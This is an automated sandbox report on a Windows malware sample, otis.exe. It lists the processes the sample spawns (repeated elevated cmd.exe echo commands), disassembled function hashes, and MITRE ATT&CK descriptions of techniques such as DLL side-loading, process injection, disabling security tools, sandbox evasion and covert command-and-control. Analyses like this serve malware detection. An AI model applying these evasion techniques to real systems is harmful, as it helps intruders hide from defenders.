Chronological Activities

Analysis Process: cmd.exePID: 7152, Parent PID: 6580

General

Target ID:	20
Start time:	02:05:47
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5676, Parent PID: 7152

General

Target ID:	21
Start time:	02:05:47
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3804, Parent PID: 6580

General

Target ID:	22
Start time:	02:05:49
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4856, Parent PID: 3804

General

Target ID:	23
Start time:	02:05:49
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3512, Parent PID: 6580

General

Target ID:	24
Start time:	02:05:51
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1888, Parent PID: 3512

General

Target ID:	25
Start time:	02:05:51
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4948, Parent PID: 6580

General

Target ID:	26
Start time:	02:05:57
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 4144, Parent PID: 4948

General

Target ID:	27
Start time:	02:05:57
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: otis.exePID: 6580, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	13.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B8B3BFD Relevance: 1.9, Strings: 1, Instructions: 605
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

eY_H, xrefs: 00007FFD9B8B3CDD

Memory Dump Source

Source File: 00000000.00000002.4129334493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8a0000_otis.jbxd

Similarity

API ID:
String ID: eY_H
API String ID: 0-200623403
Opcode ID: 67ccb4defa49f3013bbe24224f31e42331b263c9e179f3a49bb73fe31be9e43b
Instruction ID: f9a185bf93b5affadbb7faa16a0342f13623b1e161ec851b7eb0279fc182097a
Opcode Fuzzy Hash: 67ccb4defa49f3013bbe24224f31e42331b263c9e179f3a49bb73fe31be9e43b
Instruction Fuzzy Hash: F6022931B0D5894FEB59EB789865AB97BE1EF9A314F1400BEE049C31D7DE24A842C781

Function 00007FFD9B8B3268 Relevance: 1.1, Instructions: 1067
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4129334493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8a0000_otis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e4c24f8ecc564a7738b2d3f8a6d66aed66e6b9e72c3eeee484647423c683a26
Instruction ID: 4d7dc571ddaa1be5a9be16e32938b86ac0bb8b928fb7eb57557b1ce491750f08
Opcode Fuzzy Hash: 9e4c24f8ecc564a7738b2d3f8a6d66aed66e6b9e72c3eeee484647423c683a26
Instruction Fuzzy Hash: 4F825030B0995E8FEB98EF68C461BAA73A1FF58300F554179D41EC7296CE34E942CB81

Function 00007FFD9B8A3078 Relevance: .5, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4129334493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8a0000_otis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbea5dbe3cca14f92981de28e7d4d6c727fa344ca05fce706f2397436d509838
Instruction ID: 1adcf1dd2428bc912695a63ffc7e09587a11da973307c75c4393dec12698f44a
Opcode Fuzzy Hash: fbea5dbe3cca14f92981de28e7d4d6c727fa344ca05fce706f2397436d509838
Instruction Fuzzy Hash: 53E15721F0D65E4EEBB897A98461239B7C1EF89311F5A117DE48EC31E2DF2CA9438351

Function 00007FFD9B8AA1D4 Relevance: 1.6, APIs: 1, Instructions: 117
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE ref: 00007FFD9B8AA27E

Memory Dump Source

Source File: 00000000.00000002.4129334493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8a0000_otis.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 12209e2f61c59d064f08ce8a5c2394a058c7b1201ac3c77ba0d1589ffc2436e7
Instruction ID: 9869c286b3b3123d92ee266033495a5ececf74c43202260a68c9b0749e84a813
Opcode Fuzzy Hash: 12209e2f61c59d064f08ce8a5c2394a058c7b1201ac3c77ba0d1589ffc2436e7
Instruction Fuzzy Hash: 7A31043190CB4D9FDB59DBA89845AE9BBE0FF59320F00822BD009C3552DB74A416CB91

Function 00007FFD9B8A9C0A Relevance: 1.6, APIs: 1, Instructions: 99
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE ref: 00007FFD9B8AA27E

Memory Dump Source

Source File: 00000000.00000002.4129334493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8a0000_otis.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0d76d902b6d074e4e4c53937c7df047effd1ce4a4e9d48061ac439211fbdf597
Instruction ID: ae7e4cb4ce64cc4a28c871155d3c0dce26d5a6f1a578bfadfa7e445723bf2464
Opcode Fuzzy Hash: 0d76d902b6d074e4e4c53937c7df047effd1ce4a4e9d48061ac439211fbdf597
Instruction Fuzzy Hash: 0021D231908A1C9FDB58DF9CD849BF9BBE0FB59320F00822ED009D3651DB71A4168B90

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report otis.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
otis.exe